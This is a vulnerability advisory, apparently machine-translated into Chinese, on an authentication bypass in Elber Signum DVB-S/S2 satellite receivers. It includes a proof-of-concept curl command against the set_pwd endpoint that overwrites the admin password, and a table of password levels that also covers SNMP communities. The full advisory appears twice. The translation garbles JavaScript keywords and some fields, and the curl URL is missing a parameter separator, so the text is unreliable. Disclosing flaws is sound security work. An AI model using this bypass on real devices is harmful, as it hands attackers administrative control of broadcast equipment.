无线电网络的Elber Signum DVB-S/S2 IRD 1.999身份验证旁路
Vendor: Elber S.R.L.
产品网页: https://www.elber.it
受影响的版本: 1.999修订1243
1.317修订602
1.220修订1250
1.220修订1248_1249
1.220修订597
1.217修订1242
1.214修订1023
1.193修订924
1.175修订873
1.166修订550
摘要: Elber卫星设备的信号控制器解调
一两个DVB-S/S2信号最大32APSK(单/多流),实现
256 ks/s作为最小符号率。 TS解调的信号可以对齐
并在1+1个无缝切换中配置以冗余。冗余也可以
可以通过外部ASI和TSOIP输入来实现。信号支持MPEG-1 LI/II
音频编解码器,提供模拟和数字输出;而且,这是可能的
要设置一个数据PID,以解码并传递给内部RDS编码器,
生成双MPX FM输出。
DESC:通过
对密码管理功能的直接且未经授权的访问。这
问题允许攻击者通过操纵set_pwd绕过身份验证
端点使他们能够覆盖该密码
系统。这将授予未经授权的管理访问权限
应用程序损害了设备的系统安全性。
--------------------------------------------------------------------------------------------------------------------------
/modules/pwd.html
-------------------------
50:函数apply_pwd(级别,PWD)
51: {
52: $ .get('json_data/set_pwd',{lev:level,pass
wd},
53:功能(数据){
54: //qul.alert( {title:'operation'Stext:data});
55: show_message(数据);
56:})。失败(function(error){
57: show_message('错误' + error.status,'error');
58:});
59:}
--------------------------------------------------------------------------------------------------------------------------
在: NBFM控制器上测试
头脑/IP
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2024-5814
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2024-5814.php
18.08.2023
- -
$ curl -s http://[target]/json_data/set_pwd?lev=2pass=admin1234
参考(LEV参数):
级别7=SNMP写入社区(SNMP_WRITE_PWD)
级别6=snmp读取社区(snmp_read_pwd)
级别5=自定义密码?隐。 (custom_pwd)
级别4=显示密码(display_pwd)?
级别2=管理员密码(admin_pwd)
级别1=超级用户密码(puser_pwd)
级别0=用户密码(user_pwd)
Vendor: Elber S.R.L.
产品网页: https://www.elber.it
受影响的版本: 1.999修订1243
1.317修订602
1.220修订1250
1.220修订1248_1249
1.220修订597
1.217修订1242
1.214修订1023
1.193修订924
1.175修订873
1.166修订550
摘要: Elber卫星设备的信号控制器解调
一两个DVB-S/S2信号最大32APSK(单/多流),实现
256 ks/s作为最小符号率。 TS解调的信号可以对齐
并在1+1个无缝切换中配置以冗余。冗余也可以
可以通过外部ASI和TSOIP输入来实现。信号支持MPEG-1 LI/II
音频编解码器,提供模拟和数字输出;而且,这是可能的
要设置一个数据PID,以解码并传递给内部RDS编码器,
生成双MPX FM输出。
DESC:通过
对密码管理功能的直接且未经授权的访问。这
问题允许攻击者通过操纵set_pwd绕过身份验证
端点使他们能够覆盖该密码
系统。这将授予未经授权的管理访问权限
应用程序损害了设备的系统安全性。
--------------------------------------------------------------------------------------------------------------------------
/modules/pwd.html
-------------------------
50:函数apply_pwd(级别,PWD)
51: {
52: $ .get('json_data/set_pwd',{lev:level,pass

53:功能(数据){
54: //qul.alert( {title:'operation'Stext:data});
55: show_message(数据);
56:})。失败(function(error){
57: show_message('错误' + error.status,'error');
58:});
59:}
--------------------------------------------------------------------------------------------------------------------------
在: NBFM控制器上测试
头脑/IP
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2024-5814
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2024-5814.php
18.08.2023
- -
$ curl -s http://[target]/json_data/set_pwd?lev=2pass=admin1234
参考(LEV参数):
级别7=SNMP写入社区(SNMP_WRITE_PWD)
级别6=snmp读取社区(snmp_read_pwd)
级别5=自定义密码?隐。 (custom_pwd)
级别4=显示密码(display_pwd)?
级别2=管理员密码(admin_pwd)
级别1=超级用户密码(puser_pwd)
级别0=用户密码(user_pwd)